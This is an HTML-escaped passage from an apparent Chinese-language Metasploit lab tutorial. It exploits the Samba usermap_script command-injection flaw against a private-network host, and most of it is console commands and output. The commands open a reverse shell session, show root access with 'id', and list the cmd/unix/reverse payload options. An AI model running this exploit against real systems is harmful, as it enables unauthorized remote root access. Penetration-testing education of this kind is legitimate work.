data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-s &lt;opt&gt; Run a script <span class=\"hljs-keyword\">or<\/span> module <span class=\"hljs-keyword\">on<\/span> the session given <span class=\"hljs-keyword\">with<\/span> -i, <span class=\"hljs-keyword\">or<\/span> all<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-t &lt;opt&gt; <span class=\"hljs-keyword\">Set<\/span> a <span class=\"hljs-built_in\">response<\/span> timeout (<span class=\"hljs-keyword\">default<\/span>: <span class=\"hljs-number\">15<\/span>)<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-u &lt;opt&gt; Upgrade a shell <span class=\"hljs-keyword\">to<\/span> a meterpreter session <span class=\"hljs-keyword\">on<\/span> many platforms<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-v List all active sessions <span class=\"hljs-keyword\">in<\/span> verbose mode<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-x Show extended information <span class=\"hljs-keyword\">in<\/span> the session table<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Many options allow specifying session ranges using commas <span class=\"hljs-keyword\">and<\/span> dashes.<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">For<\/span> example: sessions -s checkvm -i <span class=\"hljs-number\">1<\/span>,<span class=\"hljs-number\">3<\/span><span class=\"hljs-number\">-5<\/span> <span class=\"hljs-keyword\">or<\/span> sessions -k <span class=\"hljs-number\">1<\/span><span class=\"hljs-number\">-2<\/span>,<span class=\"hljs-number\">5<\/span>,<span class=\"hljs-number\">6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/samba\/usermap_script) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable vbscript\"><\/code><\/pre>\n<p>6\u3001\u8981\u91cd\u65b0\u56de\u5230\u521a\u624d\u7684\u4f1a\u8bdd\uff0c\u53ef\u4f7f\u7528<code>sessions -i [session_id]<\/code>\u547d\u4ee4\uff0c\u4f7f\u7528<code>sessions -l<\/code>\u53ef\u67e5\u770b\u6240\u6709\u6fc0\u6d3b\u7684\u4f1a\u8bdd\u5217\u8868\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sessions<\/span> <span class=\"hljs-string\">-l<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Active<\/span> <span class=\"hljs-string\">sessions<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">===============<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Id<\/span> <span class=\"hljs-string\">Name<\/span> <span class=\"hljs-string\">Type<\/span> <span class=\"hljs-string\">Information<\/span> <span class=\"hljs-string\">Connection<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">--<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----------<\/span> <span class=\"hljs-string\">----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">shell<\/span> <span class=\"hljs-string\">cmd\/unix<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span><span class=\"hljs-string\">:51353<\/span> <span class=\"hljs-string\">(192.168.177.145)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sessions<\/span> <span class=\"hljs-string\">-i<\/span> <span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Starting<\/span> <span class=\"hljs-string\">interaction<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-number\">1<\/span><span class=\"hljs-string\">...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">id<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">uid=0(root)<\/span> <span class=\"hljs-string\">gid=0(root)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">ip<\/span> <span class=\"hljs-string\">a<\/span> <span class=\"hljs-string\">show<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">1: lo:<\/span> <span class=\"hljs-string\">&lt;LOOPBACK,UP,LOWER_UP&gt;<\/span> <span class=\"hljs-string\">mtu<\/span> <span class=\"hljs-number\">16436<\/span> <span class=\"hljs-string\">qdisc<\/span> <span class=\"hljs-string\">noqueue<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">link\/loopback<\/span> <span class=\"hljs-number\">00<\/span><span class=\"hljs-string\">:00:00:00:00:00<\/span> <span class=\"hljs-string\">brd<\/span> <span class=\"hljs-number\">00<\/span><span class=\"hljs-string\">:00:00:00:00:00<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">inet<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><span class=\"hljs-string\">\/8<\/span> <span class=\"hljs-string\">scope<\/span> <span class=\"hljs-string\">host<\/span> <span class=\"hljs-string\">lo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">inet6<\/span> <span class=\"hljs-string\">::1\/128<\/span> <span class=\"hljs-string\">scope<\/span> <span class=\"hljs-string\">host<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">valid_lft<\/span> <span class=\"hljs-string\">forever<\/span> <span class=\"hljs-string\">preferred_lft<\/span> <span class=\"hljs-string\">forever<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">2: eth0:<\/span> <span class=\"hljs-string\">&lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;<\/span> <span class=\"hljs-string\">mtu<\/span> <span class=\"hljs-number\">1500 <\/span><span class=\"hljs-string\">qdisc<\/span> <span class=\"hljs-string\">pfifo_fast<\/span> <span class=\"hljs-string\">qlen<\/span> <span class=\"hljs-number\">1000<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">link\/ether<\/span> <span class=\"hljs-number\">00<\/span><span class=\"hljs-string\">:0c:29:cc:9a:ea<\/span> <span class=\"hljs-string\">brd<\/span> <span class=\"hljs-string\">ff:ff:ff:ff:ff:ff<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">inet<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span><span class=\"hljs-string\">\/24<\/span> <span class=\"hljs-string\">brd<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.255<\/span> <span class=\"hljs-string\">scope<\/span> <span class=\"hljs-string\">global<\/span> <span class=\"hljs-string\">eth0<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">inet6<\/span> <span class=\"hljs-string\">fe80::20c:29ff:fecc:9aea\/64<\/span> <span class=\"hljs-string\">scope<\/span> <span class=\"hljs-string\">link<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">valid_lft<\/span> <span class=\"hljs-string\">forever<\/span> <span class=\"hljs-string\">preferred_lft<\/span> <span class=\"hljs-string\">forever<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">3: eth1:<\/span> <span class=\"hljs-string\">&lt;BROADCAST,MULTICAST&gt;<\/span> <span class=\"hljs-string\">mtu<\/span> <span class=\"hljs-number\">1500 <\/span><span class=\"hljs-string\">qdisc<\/span> <span class=\"hljs-string\">noop<\/span> <span class=\"hljs-string\">qlen<\/span> <span class=\"hljs-number\">1000<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">link\/ether<\/span> <span class=\"hljs-number\">00<\/span><span class=\"hljs-string\">:0c:29:cc:9a:f4<\/span> <span class=\"hljs-string\">brd<\/span> <span class=\"hljs-string\">ff:ff:ff:ff:ff:ff<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u8981\u7ec8\u6b62\u4f1a\u8bdd\uff0c\u53ef\u7528\u6309<code>Ctrl+c<\/code>\u3002<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">link\/ether <span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">0<\/span><span class=\"hljs-attr\">c:<\/span><span class=\"hljs-number\">29<\/span>:<span class=\"hljs-attr\">cc:<\/span><span class=\"hljs-number\">9<\/span><span class=\"hljs-attr\">a:<\/span>f4 brd <span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span>ff<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">^C <span class=\"hljs-comment\">\/\/Ctrl+C <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Abort session <span class=\"hljs-number\">1<\/span>? [y<span class=\"hljs-regexp\">\/N] y \/<\/span>\/\u8f93\u5165 y<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">\"\"<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span> - Command shell session <span class=\"hljs-number\">1<\/span> closed. Reason: User exit<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi<span class=\"hljs-regexp\">\/samba\/<\/span>usermap_script) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<h5 class=\"heading\">\u5b83\u662f\u5982\u4f55\u5de5\u4f5c\u7684<\/h5>\n<p><code>Samba<\/code>\u662f\u7528\u4e8e<code>Linux<\/code>\u548c<code>Windows<\/code>\u4e4b\u95f4\u7684\u6253\u5370\u548c\u6587\u4ef6\u5171\u4eab\u7684\u670d\u52a1\u3002<code>Samba 3.0.0<\/code>\u81f3<code>3.0.25rc3<\/code>\u7684<code>smbd<\/code>\u4e2d\u7684<code>MS-RPC<\/code>\u529f\u80fd\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7<code>SamrChangePassword<\/code>\u529f\u80fd\u7684<code>shell<\/code>\u5143\u5b57\u7b26\u6267\u884c\u4efb\u610f\u547d\u4ee4\uff0c\u5f53\u542f\u7528<code>smb.conf<\/code>\u4e2d\u201c\u7528\u6237\u540d\u6620\u5c04\u811a\u672c\u201d\u9009\u9879\u65f6(\u4e0d\u662f\u9ed8\u8ba4\u542f\u7528\u7684)\uff0c\u5141\u8bb8\u8fdc\u7a0b\u8ba4\u8bc1\u7684\u7528\u6237\u901a\u8fc7\u8fdc\u7a0b\u6253\u5370\u673a\u4e2d\u7684\u5176\u4ed6<code>MS-RPC<\/code>\u529f\u80fd\u7684\u5916\u90e8\u5143\u5b57\u7b26\u6267\u884c\u547d\u4ee4\uff0c\u4ee5\u53ca\u6587\u4ef6\u5171\u4eab\u7ba1\u7406\u3002\u8be5\u6f0f\u6d1e\u653b\u51fb\u6a21\u5757\u901a\u8fc7\u6307\u5b9a\u4e00\u4e2a\u7528\u6237\u540d\u5305\u542b<code>shell<\/code>\u5143\u5b57\u7b26,\u653b\u51fb\u8005\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002 \u56e0\u4e3a\u6b64\u9009\u9879\u7528\u4e8e\u5728\u8eab\u4efd\u9a8c\u8bc1\u4e4b\u524d\u6620\u5c04\u7528\u6237\u540d\uff0c\u6240\u4ee5\u4e0d\u9700\u8981\u8eab\u4efd\u9a8c\u8bc1\u5c31\u53ef\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u3002<\/p>\n<h5 class=\"heading\">\u6709\u6548\u653b\u51fb\u8f7d\u8377\uff1f<\/h5>\n<p>\u6211\u4eec\u6ca1\u6709\u6307\u5b9a<code>payload<\/code>\uff0c\u6240\u4ee5<code>Metasploit<\/code>\u9ed8\u8ba4\u4e3a\u6211\u4eec\u6307\u5b9a\u4e86<code>payload<\/code>\u3002\u6211\u4eec\u53ef\u7528<code>show options<\/code>\u67e5\u770b<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">show<\/span> <span class=\"hljs-string\">options<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Module<\/span> <span class=\"hljs-string\">options<\/span> <span class=\"hljs-string\">(exploit\/multi\/samba\/usermap_script):<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Name<\/span> <span class=\"hljs-string\">Current<\/span> <span class=\"hljs-string\">Setting<\/span> <span class=\"hljs-string\">Required<\/span> <span class=\"hljs-string\">Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">--------<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span> <span class=\"hljs-literal\">yes<\/span> <span class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">target<\/span> <span class=\"hljs-string\">address<\/span> <span class=\"hljs-string\">range<\/span> <span class=\"hljs-string\">or<\/span> <span class=\"hljs-string\">CIDR<\/span> <span class=\"hljs-string\">identifier<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RPORT<\/span> <span class=\"hljs-number\">139<\/span> <span class=\"hljs-literal\">yes<\/span> <span class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">target<\/span> <span class=\"hljs-string\">port<\/span> <span class=\"hljs-string\">(TCP)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Payload<\/span> <span class=\"hljs-string\">options<\/span> <span class=\"hljs-string\">(cmd\/unix\/reverse):<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Name<\/span> <span class=\"hljs-string\">Current<\/span> <span class=\"hljs-string\">Setting<\/span> <span class=\"hljs-string\">Required<\/span> <span class=\"hljs-string\">Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">--------<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span> <span class=\"hljs-literal\">yes<\/span> <span 